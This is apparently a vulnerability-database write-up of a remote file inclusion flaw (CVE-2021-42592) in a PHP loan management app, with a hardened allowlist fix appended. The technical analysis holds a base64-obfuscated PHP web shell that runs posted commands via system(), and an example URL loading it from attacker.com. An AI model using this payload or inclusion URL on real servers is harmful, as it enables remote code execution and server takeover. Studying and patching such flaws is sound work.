Attacker Value: Very High (1 user assessed)
Exploitability: Very High (1 user assessed)
User Interaction: Unknown
Privileges Required: Unknown
Attack Vector: Unknown

CVE-2021-42592

Last updated October 18, 2021
MITRE ATT&CK tactics: Execution, Initial Access

Description

** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis
  • A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Loan Management System 1.0 via the page parameter to index.php.
    The bug affects the [index.php] file through the [page] parameter due to unsafe usage of the [include] function with a remote file;

  • If we take a look at the index.php file we can see the following code:

<?php $page = isset($_GET['page']) ? $_GET['page'] :'home'; ?> <?php include $page.'.php' ?>

The index file has a parameter page, and by default its value is home. It then includes the page, adding .php to it.

The attacker logs in to the panel, then creates a PHP file that contains malicious PHP code on a remote server, then passes the malicious file URL to the target through the [page] parameter, and the target executes the code. This gives the attacker permission to do malicious activities (delete, create, modify, etc.) on the target server, and the attacker will be able to achieve RCE (remote code execution).

Note: To make the server execute your malicious code, your code must look like this:

 <?php
 echo base64_decode("PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+CgpDTUQgPGlucHV0IG5hbWU9ImNtZCIgdHlwZT0idGV4dCI+Cgo8YnI+CjxpbnB1dCBuYW1lPSJzdWIiIHR5cGU9InN1Ym1pdCI+CjwvZm9ybT4KPD9waHAKZWNobyAiPHByZT4iOwpzeXN0ZW0oQCRfUE9TVFsiY21kIl0pOwplY2hvICI8L3ByZT4iOwo/Pg==");
 ?>

E.g.: http://target.com/index.php?page=http://attacker.com/exploit
Note: Don’t add [.php] to your attacker URL because the script will add .php at the end of the [page] parameter value automatically.
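The following is a hardened replacement for the dispatcher quoted above, added here as an example; it is not code from the Loan Management System or from the assessment. Instead of concatenating the raw page parameter into include(), the requested name is looked up in a fixed allowlist that maps to local files under the application directory, so include() never receives a URL or a traversal string. The page names other than home are hypothetical.

```php
<?php
// Hardened page dispatcher (added example, not the project's own code).
// The user-controlled value is only ever used as an array key; the path
// handed to include() always comes from this allowlist.
declare(strict_types=1);

const PAGES = [
    'home'  => 'home.php',
    'loans' => 'loans.php',   // hypothetical page name
    'users' => 'users.php',   // hypothetical page name
];

/**
 * Resolve the requested page name to an absolute local file path.
 * Unknown names fall back to the home page and signal 404 to the client.
 */
function resolve_page(?string $requested, array $pages = PAGES, string $baseDir = __DIR__): string
{
    $name = $requested ?? 'home';

    // Strict key lookup: "http://...", "../etc/passwd" or "home%00" never
    // match an allowlisted key, so they cannot influence the included path.
    if (!array_key_exists($name, $pages)) {
        if (!headers_sent()) {
            http_response_code(404);
        }
        $name = 'home';
    }

    return $baseDir . DIRECTORY_SEPARATOR . $pages[$name];
}

$target = resolve_page(isset($_GET['page']) ? (string) $_GET['page'] : null);

// Defence in depth: refuse to include anything that did not resolve inside
// the application directory, even if the allowlist is later edited carelessly.
$real = realpath($target);
if ($real === false || strncmp($real, __DIR__ . DIRECTORY_SEPARATOR, strlen(__DIR__) + 1) !== 0) {
    http_response_code(500);
    exit('Page not available');
}

include $real;
```

Independently of the code fix, remote file inclusion through include() only works when the php.ini directive allow_url_include is On; it is Off by default. Keeping it Off blocks the remote-URL variant described above, but it does not help against local file inclusion through an unvalidated parameter, which is why the allowlist is the actual fix and the directive is only a backstop.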
